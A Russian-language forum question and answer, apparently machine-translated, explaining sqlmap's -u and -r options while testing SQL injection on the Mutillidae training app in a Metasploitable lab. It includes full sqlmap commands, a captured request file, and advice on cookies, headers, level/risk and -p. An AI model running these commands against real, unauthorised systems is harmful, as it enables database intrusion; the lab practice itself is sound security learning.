SQLmap: использование команд -u и -r - PullRequest
Новая
       70

SQLmap: использование команд -u и -r

0 голосов
/ 31 мая 2018

ПРИМЕЧАНИЕ. Попытка использования Mutillidae в METASPLOITABLE

Я попытался использовать SQLmap для вставки на страницу "Информация о пользователе" mutilidae.

Я уже пытался выполнить ручное внедрение, и уязвимыми параметрами являются USERNAME иПАРОЛЬ.

в то время как я использовал команду -u только для параметра SQLmap, PAGE рассматривался как параметр GET в SQLmap, что в свою очередь (как и ожидалось) привело к тому, что URL-адрес не был введен.

Позже, после использования прокси-сервера Burp и запуска SQLmap с помощью команды запроса -r, все работает нормально для одного и того же URL.

Я не совсем понимаю, как работают эти две команды и что было указано в команде -rЭто позволило успешно внедрить код, который не был указан в URL-адресе -u, который я указал.

Когда мне следует использовать какую команду?

Использование команды -u для проверки на уязвимость 

sqlmap -u http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details

Использование команды -r 

sqlmap -r /root/Desktop/user.request

user.request содержит следующее: 

GET /mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details HTTP/1.1
Host: xxx.xxx.2.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details
Cookie: PHPSESSID=cb55bd05e9618af173600ba757e996c1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 31 May 2018 06:13:15 GMT

1 Ответ

0 голосов
/ 30 июля 2018

Похоже, вы пропустили cookie в части -u: 

Cookie: PHPSESSID=cb55bd05e9618af173600ba757e996c1

Добавьте следующие аргументы в вашу команду: 

sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" --cookie="PHPSESSID=cb55bd05e9618af173600ba757e996c1" -u 'http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details' --level=5 risk=3

Уровень и риск крайне великии заставить Sqlmap использовать практически все, что нужно для тестирования вашей клиентской машины ... в этом конкретном контексте они вам на самом деле не нужны, но это полезно знать.

Если вы хотите указатьпараметр, который вы хотите, чтобы Sqlmap проверял, используйте опцию -p, например: 

-p username

Наконец, чтобы ответить на вторую часть вашего вопроса, когда вам следует использовать -r vs -u, это действительно выбор пользователя,вам может показаться более удобным помещать вашу HTTP-информацию в файл и читать непосредственно из нее (основное использование -r), или вы можете обнаружить, что вам нужен больший контроль над тем, что вы отправляете, и хотите настроить его с помощью команды-строка (основное использование -u)

...